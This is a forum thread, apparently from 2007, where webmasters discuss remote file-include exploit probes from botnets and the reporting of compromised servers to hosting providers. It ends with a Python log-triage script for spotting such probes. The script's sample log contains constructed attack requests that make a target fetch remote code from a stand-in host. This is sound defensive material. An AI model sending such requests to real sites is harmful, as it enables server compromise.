This is becoming an increasing problem that I never noticed much until a couple of months ago and now it's pretty much a non-stop daily event.
What you see isn't a spider or a crawler, it's an infected machine attempting to infect your machine with a "FILE INCLUDE" or "FILE DOWNLOADER" exploit.
The first 2 examples are trying to hit your site with the Coppermine and WordPress exploit:
[securitytracker.com...]
They are also attempting a Limbo CMS exploit:
[securitytracker.com...]
If you have any of this software on your server, you may already be breached, upgrade ASAP!
Then, send the host an AUP report about their compromised machine, complete with log file entries that detail the attack.
In this case, you'll need to send a report to HOPONE about the 66.148.71.nnn and iPowerWeb, which is literally filthy with infected servers, about the target script at "morfeus.us/M.php". At the moment it appears the site "morfeus.us" has already been shut down on iPowerWeb so you only need to address the source this time.
See, that's how these guys work. They host the file they are including on one server, and try to exploit you from another server, or bunch of servers, that downloads the file from the first server. You have to neutralize both servers to stop it and then keep an eye on whether it comes back again or not and repeat.
[edited by: incrediBILL at 1:08 am (utc) on Jan. 23, 2007]
A host enters the realm of the internet with either a weak UAG or a reluctance to enforce their UAG.
The host's customers begin bombarding other websites with queries/crawls/spiders or however you wish to name the episodes.
Webmasters are "compelled" to notify the provider "for the sake of world peace and saving the entire internet" from a security hack?
WHY?
In most instances to be responded to with an automated reply that requests information that was included in the initial report!
The provider created this problem! Let the provider solve the problem!
BTW, thanks for the insight.
I'm sick of being a victim in this cybermess and I'm using everything at my disposal.
If everyone did something proactive for the entire community, instead of just dropping people in the firewall and solving only YOUR problem, the situation would get better instead of worse.
Bill,
Participation in this forum is "proactive", especially when the activity has exceeded six years.
There was a time when the forum activity/announcements were instantaneous and for the most part without moderation, however that was brought to a halt by users attempting to stifle their competitors.
ok, what things can you do that are not "on your site" to help alleviate the issue?
Brett,
I'm assuming your intervention and separation of the threads is because you realize the possibility of something worthwhile in Forum 11, as opposed to our normal ramblings ;)
My profile shows that I've been a member since 2001, however it was actually earlier.
I use a different pseudo in Newsgroups and online forums and in 2001 I flip-flopped the pseudos. NGs and another person providing a URL to Webmaster World is how I originally found this forum.
During my 6-7 years of participation at Webmaster World (and beyond my most recent ventures into other WW Forums), 99.99% of my participation has been confined to Forum 11 (Search Engine Spider Identification).
The forum charter although created with good intent is not really what this forum has been utilized for. NOT yesterday and certainly not today!
SSID did have a period of approximately nine months where the forum was no longer active.
During the past 6-7 years, we've had a variety of participants come through the doors with a variety of opinions and insights.
For the most part the forum remains functional and on topic with very little off-topic chatter.
At one time and for approximately two years, we had a bot creator chasing many threads providing insights from a BOT's point-of-view. Some of the insights were beneficial and thoughtful, however the injecture of the comments was only intended to deter "denial of access" by forum participants and potential non-forum participants/webmasters.
We've had other such injectures, however they usually don't stay long.
AUP and/or UAG
The first return on a google from a major internet provider provides some interesting insight.
[google.com...]
The lines of the provider's AUP are a fairly standard presentation of policy for most internet providers.
The policies are also double-talk (BS) and rarely enforced.
Any provider who made the decision to properly enforce these policies in today's internet would accomplish two things:
1) Invariably increasing their staff and/or expenses to facilitate policy.
2) Be closing their business doors before long.
WHY?
The primary weakness is in use of the terms "network and effect of actions on other subscribers".
A customer's actions that result in a webmaster's denial of access potentially affect all (until recent changes by providers in subnet structures of IP ranges) the provider's customers.
In late-November of 2001 I received the following reply from a major internet provider when I submitted an AUP/UAG violation and supported that submission with logs and links from the provider's own AUP/UAG:
"Blocking #*$!#*$! IP's will not rectify your situation, as it would not prevent other websites from linking your images. There are technological solutions to prevent people from linking your images. I am not sure what kind of http server you are currently running, but here is a link to a guide for url rewriting with apache webserver,
[httpd.apache.org...] . I can understand your frustration, as I was in the same position as you are at one point and found that solving the problem was better than patching it."
end of quote
After reading and re-reading the above, my participation at SSID increased. My awareness of the capabilities of using htaccess to accomplish what the provider suggested as "technological solutions" are the solutions. NOT only for images, however full implementation of access for accountability.
Up until late 2001, I believed in the tooth-fairy, Santa Claus, the Easter Bunny and also that internet providers would act responsibly in enforcement of AUP/UAG and feedback from webmasters providing insights.
These days (same old song) we have some new blood in forum 11 suggesting that methods of which many participants have attempted over and again (another example is Gary's experience with Yahoo) are new and original concepts to solve world peace ;) or at least provide "proactivity".
Encouraging others to determine what is beneficial or detrimental to their own websites is the solution.
As is continued re-evaluation of providers' actions and denial of access on each of our own website(s).
Communication with internet providers is a waste of time.
Don
Communication with internet providers is a waste of time.
Don, sadly I think you are jaded and should change your statement to "Communication with SOME internet providers is a waste of time." which is absolutely true. However, don't lump them all into your blanket statement as I've just ended fighting a major attack and many of them were quite helpful. Some responded the same day, others took a couple of days, some took over a week but only a couple were impossible to deal with but I found a way to make them pay attention as well.
As a matter of fact, in the last month I've had several of them personally email me back, and a couple of admins actually CALLED me on the phone, one from Canada even, and coordinated collecting and sharing information about the botnet.
ok, what things can you do that are not "on your site" to help alleviate the issue?
When I started being seriously attacked I had almost 200 IPs involved and after contacting the domain owner of the rented server and filing AUP reports over 50% of them were shut down within a week. I monitored the log files and the same IPs came back day after day and suddenly they vanished in chunks per hosting company as they were being resolved.
True, just blocking the IPs involved can help protect just YOUR server but failing to report them leaves the botnet intact, which could also be used to infect or DDoS someone else's server. I've seen all the code that was involved with the botnets attacking my server and it's complete with DDoS capabilities, nothing you want left sitting out there.
The majority of the servers involved were dedicated servers that had been breached and the person renting the server usually doesn't want his business hacked. When possible, I notified the breached server/site owner that was being used as an unwilling host for the attack. Also write directly to abuse@ the hosting company, or CC the host in the email to the person renting their server.
When I notified the person renting the server and/or filed the AUP reports with the host, I included the following information:
1. A sample of the log file showing the IP involved in the attack
2. A brief description of the exploit they were trying to use
3. A link to a security site with more information, including the types of files that might be found on their server in some cases.
Remember, the ISP has to protect their clients and, except in extreme circumstances, won't just shut down a box without investigation on the first complaint. This is to protect their customers from aggressive competitors or other malicious parties that could falsely report someone's server just to get them taken offline. Be patient and report each attack from the ISP's network so they can see it's a real repeated problem and not just a false complaint.
Now the second problem, maybe the more important problem, the host where the file being downloaded as part of the exploit is hosted. In the case of the botnet hitting my box, the attacks all came from places other than the location hosting the hackers package as they didn't want that shut down as all the bots download the file from the same location. To protect others from being infected, getting this file offline ASAP should be your top priority.
Sometimes you find a botnet with a permanent file download location such as some notorious ones hosted in Russia, and the best thing you can do is block that entire network from your server as they will never fix the problem, it's been years now.
If you're lucky, you might knock the botnet C&Cs offline (Command & Controls) [eweek.com] which slowed them down a little and sometimes it took several days before the attacks resumed.
As a last resort of desperation, when you have a host within your legal jurisdiction that refuses to honor their AUP, I found a quick C&D regarding halting the hacking activities coming within their network will get their attention.
You may want to report these incidents to law enforcement or cyber crime task forces as well because some of the operators of botnets [theregister.co.uk] have been caught and are going to jail. [theregister.co.uk]
FWIW, I've also effectively used the AUP as a tool to shut down some other bad bots and MFA scrapers as well, but that's a different post.
[edited by: incrediBILL at 9:32 pm (utc) on Jan. 23, 2007]
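As an added example (not code from anyone in this thread), a small Python script that does the log triage described in the two posts above: it picks remote-file-include probes out of Apache access-log lines, groups the evidence per attacking IP for the AUP report to that IP's host, and separately lists the server serving the included file so it can be reported for takedown. The log lines, IP addresses and the `payload.example` host are constructed sample values; `OWN_HOSTS` is an assumed list of your own hostnames used to avoid flagging ordinary redirect parameters.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qsl

# Constructed Apache combined-log sample (not from the thread): three remote-include
# probes from two infected machines, plus two legitimate requests for contrast.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Jan/2007:01:02:03 +0000] "GET /gallery/index.php?file=http://payload.example/M.php? HTTP/1.1" 404 291 "-" "Mozilla/4.0"
198.51.100.7 - - [23/Jan/2007:01:02:09 +0000] "GET /wp-content/plugins/x.php?inc=http%3A%2F%2Fpayload.example%2FM.php%3F HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
192.0.2.10 - - [23/Jan/2007:01:03:11 +0000] "GET /limbo/index.php?option=ftp://payload.example/M.php HTTP/1.1" 404 291 "-" "Mozilla/4.0"
203.0.113.5 - - [23/Jan/2007:01:04:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jan/2007:01:04:02 +0000] "GET /index.php?next=http://www.example.com/thanks HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

OWN_HOSTS = {"www.example.com"}  # assumed: our own names; a URL pointing back at us is a redirect, not an include


def remote_include_hosts(target):
    """Hosts of query-string values that are themselves URLs to a foreign server."""
    hosts = []
    for _, value in parse_qsl(urlparse(target).query, keep_blank_values=True):
        inner = urlparse(value)  # parse_qsl has already percent-decoded the value
        if inner.scheme in ("http", "https", "ftp") and inner.hostname and inner.hostname not in OWN_HOSTS:
            hosts.append(inner.hostname)
    return hosts


def find_rfi_attempts(log_text):
    """Return (source_ip, payload_host, raw_line) for every remote-include attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            hits.extend((m.group("ip"), host, line) for host in remote_include_hosts(m.group("target")))
    return hits


def group_for_reports(hits):
    """Evidence lines per attacking IP (for its host's abuse desk) and the attacking IPs
    per payload host (the server whose file should be taken down)."""
    per_source, per_payload = defaultdict(list), defaultdict(set)
    for ip, host, line in hits:
        per_source[ip].append(line)
        per_payload[host].add(ip)
    return dict(per_source), {h: sorted(ips) for h, ips in per_payload.items()}


if __name__ == "__main__":
    sources, payload_hosts = group_for_reports(find_rfi_attempts(SAMPLE_LOG))
    print({ip: len(lines) for ip, lines in sources.items()}, payload_hosts)
```

Each entry in the first dictionary is the log excerpt to attach to an AUP report for that source; the second tells you which host is serving the included file and therefore needs its own report.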